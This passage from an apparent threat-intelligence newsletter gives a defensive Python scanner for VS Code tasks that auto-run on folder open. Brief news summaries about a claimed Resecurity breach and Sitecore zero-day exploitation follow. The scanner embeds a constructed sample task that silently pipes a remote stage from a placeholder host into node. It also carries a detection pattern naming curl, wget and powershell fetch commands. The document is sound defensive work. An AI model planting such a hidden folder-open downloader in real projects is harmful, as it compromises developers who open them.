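The article summary above does not say how the project gets its payload to run. One documented VS Code mechanism that fits the description is an automatic task: a task in .vscode/tasks.json whose runOptions.runOn is "folderOpen" runs as soon as the folder is opened (after the user allows automatic tasks, which a job-assessment pretext is built to obtain). The scanner below is an added example, not code from the article, from DarkOwl, or from the campaign; it assumes that mechanism, and the sample tasks.json it writes to a temporary directory is constructed for the example. Run it against a cloned repository before opening the repository in the editor.

```python
"""Scan a cloned repository for VS Code tasks that run automatically or fetch
remote code. Added example; assumes the .vscode/tasks.json automatic-task
mechanism, and the sample tasks.json below is constructed."""
import json
import os
import re
import tempfile

# Shell fragments that fetch or execute a second stage; extend for your environment.
SUSPICIOUS = re.compile(
    r"(curl|wget|Invoke-WebRequest|\biwr\b|node -e|python -c|base64|powershell|bash -c)",
    re.I,
)

# Constructed sample: one benign build task and one hidden folder-open task that
# pulls a stage from a hypothetical host (.invalid TLD, so it resolves nowhere).
SAMPLE_TASKS_JSON = r'''{
  // VS Code task format
  "version": "2.0.0",
  "tasks": [
    {
      "label": "npm: build",
      "type": "shell",
      "command": "npm run build"
    },
    {
      "label": "Prepare workspace",
      "type": "shell",
      "command": "node",
      "args": ["-e", "require('child_process').exec('curl -s http://example.invalid/stage | node')"],
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" },
    }
  ]
}'''


def load_tasks(path):
    """Parse tasks.json. VS Code accepts JSON with comments and trailing
    commas, so strip full-line // comments, block comments and trailing commas
    before handing the text to json.loads."""
    with open(path, encoding="utf-8") as f:
        text = f.read()
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return json.loads(text)


def find_auto_tasks(tasks):
    """Return a finding for each task that runs on folder open, or whose
    command line matches the SUSPICIOUS patterns, whichever applies."""
    findings = []
    for task in tasks.get("tasks", []):
        run_on = (task.get("runOptions") or {}).get("runOn")
        cmd = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
        auto = run_on == "folderOpen"
        suspicious = bool(SUSPICIOUS.search(cmd))
        if auto or suspicious:
            findings.append({
                "label": task.get("label", "<unnamed>"),
                "auto_run": auto,
                "suspicious_command": suspicious,
                "command": cmd,
            })
    return findings


def scan_repo(root):
    """Walk the tree so nested workspaces with their own .vscode folder are covered."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in filenames:
            path = os.path.join(dirpath, "tasks.json")
            try:
                tasks = load_tasks(path)
            except (json.JSONDecodeError, OSError) as exc:
                # An unparseable tasks.json is itself worth a look, so report it.
                findings.append({"label": path, "auto_run": None,
                                 "suspicious_command": None, "command": f"unparseable: {exc}"})
                continue
            for finding in find_auto_tasks(tasks):
                finding["file"] = path
                findings.append(finding)
    return findings


def demo():
    """Write the constructed sample into a temporary repo and scan it."""
    with tempfile.TemporaryDirectory() as root:
        vscode = os.path.join(root, ".vscode")
        os.makedirs(vscode)
        with open(os.path.join(vscode, "tasks.json"), "w", encoding="utf-8") as f:
            f.write(SAMPLE_TASKS_JSON)
        return scan_repo(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

The folder-open check is the important one: a task that only looks suspicious may be a legitimate build step, but a hidden task that runs the moment the folder opens has no place in a coding assessment. Keeping automatic tasks disabled in VS Code (the default prompt) and reviewing .vscode before answering "allow" closes the same gap without a script.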

7. Hackers claim to hack Resecurity, firm says it was a honeypot – BleepingComputer

Scattered Lapsus$ Hunters (SLH) announced via Telegram that they had breached systems belonging to Resecurity and stolen internal data. To support their claims, SLH posted screenshots of the data, which showed communications between employees and Pastebin personnel. Resecurity published a report in December 2025 disputing the claims, stating that after identifying threat actor probing activity in November 2025 it had deployed a “honeypot” account. The account sat in an isolated environment, contained fake information, and was being monitored. Read full article.

8. China-linked hackers exploited Sitecore zero-day for initial access – BleepingComputer

The China-linked threat actor UAT-8837 has been observed attempting to compromise North American infrastructure by exploiting both known and zero-day vulnerabilities. The attacks begin with compromised credentials or with exploitation of server vulnerabilities. Recent attacks include exploitation of a zero-day flaw in Sitecore products, CVE-2025-53690. Researchers claim UAT-8837 uses “open-source and living-off-the-land utilities, continually cycling variants to evade detection.” Learn more.


Make sure to register for our weekly newsletter to get access to what our analysts are reading on a weekly basis.

Copyright © 2026 DarkOwl, LLC All rights reserved.
Privacy Policy
DarkOwl is a Denver-based company that provides the world’s largest index of darknet content and the tools to efficiently find leaked or otherwise compromised sensitive data. We shorten the timeframe to detection of compromised data on the darknet, empowering organizations to swiftly detect security gaps and mitigate damage prior to misuse of their data.